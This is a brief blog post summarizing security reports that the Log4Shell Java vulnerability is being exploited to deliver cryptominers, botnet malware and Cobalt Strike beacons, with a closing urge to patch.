“Log4Shell” Java Flaw Being Used To Deliver Malware & Crypto-Miners

Last Friday a super critical Java flaw called “Log4Shell” came to light and sent sysadmins scrambling to patch all the things. Websites around the world have gone down to patch this flaw for example. And now we know why. According to Bleeping Computer, threat actors have been using the vulnerability to deliver crypto-miners, botnet, and penetration tools that could be used to deploy ransomware on affected systems:

As soon as the vulnerability was released, we saw threat actors exploiting the Log4Shell vulnerability to execute shell scripts that download and install various cryptominers, as shown below.

The threat actors behind the Kinsing backdoor and cryptomining botnet are heavily abusing the Log4j vulnerability with Base64 encoded payloads that have the vulnerable server download and execute shell scripts.


Netlab 360 reports that the threat actors exploit the vulnerability to install the Mirai and Muhstik malware on vulnerable devices.

These malware families recruit IoT devices and servers into their botnets and use them to deploy cryptominers and perform large-scale DDoS attacks.


The Microsoft Threat Intelligence Center reported that the Log4j vulnerabilities are also being exploited to drop Cobalt Strike beacons.

Cobalt Strike is a legitimate penetration testing toolkit where red teamers deploy agents, or beacons, on “compromised” devices to perform remote network surveillance or execute further commands.

However, threat actors commonly use cracked versions of Cobalt Strike as part of network breaches and during ransomware attacks. 

And finally:

In addition to using the Log4Shell exploits to install malware, threat actors and security researchers are using the exploit to scan for vulnerable servers and exfiltrate information from them.

So if you haven’t patched your infrastructure, you should get to it as it clearly is being exploited.

One Response to ““Log4Shell” Java Flaw Being Used To Deliver Malware & Crypto-Miners”

  1. […] the planet scrambling to patch all the things last week before they were exploited by bad actors. Which is something that didn’t take long to happen. It’s now become a free for all as bad actors are really going to town in terms of exploiting […]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: